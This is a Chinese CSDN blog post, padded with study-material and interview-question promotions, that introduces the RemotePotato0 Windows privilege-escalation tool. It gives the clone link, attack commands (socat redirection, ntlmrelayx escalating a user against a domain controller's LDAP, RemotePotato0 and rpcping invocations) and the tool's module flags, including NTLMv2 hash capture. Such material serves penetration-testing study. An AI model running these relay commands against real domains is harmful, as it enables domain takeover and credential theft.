2024年网络安全最新使用RemotePotato0从普通用户提升至域管理员_potato-2(1),网络安全研发岗面试复盘总结

于 2024-05-07 14:08:57 发布
阅读量617 收藏 27
点赞数 18
分类专栏: 程序员 文章标签: web安全 面试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84264096/article/details/138530196
版权

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

关于RemotePotato0
RemotePotato0是一款功能强大的Windows提权工具,本质上来说RemotePotato0是一个漏洞利用工具,可以帮助广大研究人员在Windows系统上,从一个普通用户提权至域管理员权限。
RemotePotato0可以利用DCOM激活服务,并触发针对当前登录到目标计算机的任何用户的NTLM身份验证。与此同时,该工具还需要在相同设备上已经有特权用户登录了(比如说,域管理员用户)。一旦触发NTLM type1,RemotePotato0将设置一个跨协议中继服务器,该服务器将负责接收特权type1消息,并通过解包RPC协议和HTTP打包身份验证,然后将其中继到第三个资源。在接收端,你可以设置另一个中继节点(如ntlmrelayx)或直接中继到特权资源。除此之外,RemotePotato0还允许抓取和窃取登录到目标设备上的每个用户的NTLMv2哈希。

源码获取
广大研究人员可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/antonioCoco/RemotePotato0.git

使用场景
攻击设备(10.0.0.20)
目标设备(10.0.0.45)
目标域控制器(10.0.0.10)
模块0 - Rpc2Http跨协议中继服务器 + potato触发器
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.45:9999 &
sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user
注意:如果你操作的是Windows Server <= 2016,你可以避免使用网络重定向器(socat):
query user
.\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1
模块1 - Rpc2Http跨协议中继服务器
.\RemotePotato0.exe -m 1 -l 9997 -r 10.0.0.20
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm
模块2 - RPC捕捉(哈希)服务器
.\RemotePotato0.exe -m 3 -l 9997
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm

工具使用
RemotePotato0
Mandatory args:
-m module
Allowed values:
0 - Rpc2Http cross protocol relay server + potato trigger (default)
1 - Rpc2Http cross protocol relay server
2 - Rpc capture (hash) server + potato trigger
3 - Rpc capture (hash) server

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84264096
关注
  • 18
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RemotePotato0域内权限提升漏洞
谢公子的博客
09-18 3419
RemotePotato是Antonio Cocomazzi和Andrea Pierini发现的一种域内攻击技术,它允许攻击者将域用户权限提升到Enterprise Admin组内,此技术执行跨协议中继以实现NTLM Relay攻击,并将提升的NTLM身份验证流量中继到域控制器以实现权限提升。 利用前提条件: 具有域管理员特权的用户已经登录到受害者主机或通过远程桌面登录 攻击者已获得对受害者主机的初始访问权限,或者已通过WinRM或SSH访问(拥有本地管理员权限的账号,可以是本地administrat
48-4 内网渗透 - Rotten Potato(烂土豆) 提权
最新发布
weixin_43263566的博客
06-21 238
在渗透测试中,Potato家族是一种常用的提权技术,主要利用Windows服务账户的特权来将已获取的权限提升至系统(SYSTEM)级别。具体而言,Potato家族的攻击方式是将已获得的NT AUTHORITY\SYSTEM账户的访问令牌传递给CreateProcessWithTokenW或CreateProcessAsUserA函数,从而在SYSTEM账户的上下文中启动新进程,从而实现权限提升。,这篇文章介绍的提权方式跟之前最大的优势就是可以通过。,上一篇文章介绍的只能在管理员权限的基础上提升
使用RemotePotato0普通用户提升至域管理员
weixin_43977912的博客
10-09 267
关于RemotePotato0 RemotePotato0是一款功能强大的Windows提权工具,本质上来说RemotePotato0是一个漏洞利用工具,可以帮助广大研究人员在Windows系统上,从一个普通用户提权至域管理员权限。 RemotePotato0可以利用DCOM激活服务,并触发针对当前登录到目标计算机的任何用户的NTLM身份验证。与此同时,该工具还需要在相同设备上已经有特权用户登录了(比如说,域管理员用户)。一旦触发NTLM type1,RemotePotato0将设置一个跨协议中继服务器,该
RemotePotato0:从用户到域管理员的另一次“不会修复” Windows特权升级
05-12
遥控土豆0 从用户到域管理员的另一个Windows特权升级“不会解决”。 RemotePotato0是一种利用程序,可让您将特权从一般用户升级为Domain Admin。 简要地: 它滥用DCOM激活服务并触发当前在目标计算机上登录的用户的NTLM身份验证。 要求您在会话0中具有外壳(例如WinRm Shell或SSH Shell),并且特权用户在会话1中已登录(例如Domain Admin用户)。 触发NTLM type1后,我们将建立一个跨协议中继服务器,以接收特权的type1消息,并通过解压缩RPC协议并通过HTTP打包身份验证将其中继到第三个资源。 在接收端,您可以设置另一个中继节点(例如ntlmrelayx)或直接中继到特权资源。 有关详细信息,请访问-> 例子 攻击者机器(192.168.83.130): sudo socat TCP-LISTEN:135,for
Remote Potato–从域用户到企业管理员
weixin_51387754的博客
05-10 494
文章前言 NTLM中继是一项众所周知的技术,主要用于安全评估中,以便在网络中的服务器上建立立足点或用于特权提升方案。在没有为LDAP和SMB协议启用签名的网络中,这种攻击是可行的。此外,正在使用提升的帐户身份验证到服务器和工作站中的域管理员可以为攻击者提供机会,使他们可以通过LSASS或通过使用远程马铃薯技术来转储其凭据,从而对整个域造成损害。 Remote Potato是Antonio Cocomazzi和Andrea Pierini发现的一种技术,它允许攻击者将其权限从域用户提升到Enterprise
域用户提权
wuxinweii的博客
11-21 3542
MS14-068漏洞利用 什么是MS14-068漏洞? 在kerberos 协议中,Client去访问Server,需要知道是否具有访问权限。所以微软在KRB_AS_REP中的TGT中增加了Client的PAC(特权属性证书),也就是Client的权限,包括Client的User的SID、Group的SID。 ms14-068 漏洞就是在经过身份验证的Client在TGT中伪造高权限的PAC。 该漏洞允许任何一个域普通用户,将自己提升至域管理员权限。微软给出的补丁号kb3011780。 MS14-068是非
信息安全_数据安全_whoami%20_priv%20-%20show%20me%2.pdf
08-23
在信息安全领域,数据安全是至关重要的一个环节,而深入理解系统权限与令牌管理则是保障数据安全的关键。此话题源于一场由Andrea Pierini(@decoder_it)于20196月19日在巴黎进行的演讲——"show me your ...
potato-2.25.2.apk
10-30
potato-2.25.2.apk
purescript-emo8::roasted_sweet_potato:可以创建表情符号游戏的功能性2D游戏引擎
02-04
想要使用PureScript编写清晰的程序 为什么是表情符号? 可以在任何地方使用的熟悉的材料 创建游戏,例如组装乐高积木 有趣的是有一些限制,例如 为什么选择PureScript? 语言抽象 可分配性 PureScript ○ ○ ...
potato-2.37.5.apk
06-06
potato-2.37.5.apk
Potato-Windows-2.35
04-01
Potato-Windows-2.35........................................................................................................................................................................................
BadPotato:Windows权限提升BadPotato
03-19
坏土豆 Windows 2012-2019 Windows 8-10 引用
微软拒绝修复影响所有 Windows 版本的 “RemotePotatoo” 提权0day
smellycat000的专栏
01-14 190
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Sentinel LABS 的研究员 Antonio Cocomazzi 发现了一个影响所有 Windows 版本的提权漏洞,可导致攻击...
如何使计算机用户具有管理权限,如何把电脑普通用户权限提升超级管理员账户...
weixin_34404671的博客
06-20 5436
电脑win10会默认的让你新建一个用户。这样的目的是给用户降权,防止一些误操作损坏系统。很多同学都会说,我已经不是新手了。有管理员权限还是会方便一些的。那么今天就教大家如何提升普通用户的权限。一、开启系统默认的administrator账户打开运行,输入“compmgmt.msc”后进入计算机管理。开启administrator账户。(在win10中administrator账户默认是没有开启的)...
为域用户提升本机管理员权限
weixin_30550081的博客
04-09 1208
假如用户“test_2”成功加入域“xx.com”后,默认是域用户权限,怎样让这个域用户在本机有管理员权限呢?请如下操作。 用本机管理员登陆电脑。右键点击我的电脑->管理->本地用户和组->组 右键选择“Administrators->属性”,点击“添加”然后输入”test_2“,输入域管理员的账号和密码,确定后添加成功,然后重启电脑,用test_2的用户名登陆到xx....
域控服务器通过策略提升普通用户权限
u014588173的博客
11-16 2082
提升普通域用户权限,用于普通用户安装软件 1.在域控主机上添加一条GPO,指向需要权限的OU 2.编辑GPO-用户配置-控制面板设置-本地用户和组 3.然后右击-新建-本地组 4.操作选:更新, 组名选Administrators(内置),勾选选加当前用户 设置完成后,域服务器更新组策略(gpupdate) 然后到域用户电脑,注销当前登录或重启电脑。域用户就有本机管理员的权限了
Potato家族提权学习
include_voidmain的博客
10-24 1038
Potato家族提权学习
Potato家族本地提权分析
SecINAdmin的博客
12-01 1083
0x00 前言 在实际渗透中,我们用到最多的就是Potato家族的提权。本文着重研究Potato家族的提权原理以及本地提权细节 0x01 原理讲解 1.利用Potato提权的是前提是拥有SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限,以下用户拥有SeImpersonatePrivilege权限(而只有更高权限的账户比如SYSTEM才有SeAssignPrimaryTokenPrivilege权限): 本地管理员账户(不包括管理员组普通账户)和本地
Potato提权小结
热门推荐
wo41ge的博客
11-11 1万+
前言 当我们拿到webshell 却苦于无法提权 早之前有巴西烤肉提权,有pr提权 今天 来一个土豆提权合集 妈妈再也不担心我的webshell无法提权了 Hot Potato 前言 利用 Windows 中的已知问题在默认配置中获得本地权限提升 即 NTLM 中继(特别是 HTTP->SMB 中继)和 NBNS 欺骗 攻击者可以在安装了Windows操作系统的工作站中将自己的低权限提升至NT AUTHORITY\SYSTEM 影响范围 Windows 7、8、10、Server 2008 和 Ser
Hot potato实验 • 设置发送信息的长度,从0号进程依次发送 • 0->1->2…->n-1->0形成一个环形的的圈,记录下每两跳之间的时间 以及总时长,多次实验(>=5)计算平均值,方差 • 改变发送信息的长度(1kb, 10kb, 100kb…)测试数据 • 分配内存使用malloc() • MPI_Sendresv() MPI_COMM_WORLD
06-08
好的,这是一个关于Hot potato实验的计划。首先,需要编写一个MPI程序,以模拟Hot potato路由算法。可以按照以下步骤进行: 1. 设置发送信息的长度。可以使用一个变量来保存消息长度,初始值为0,每次循环将其加1,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值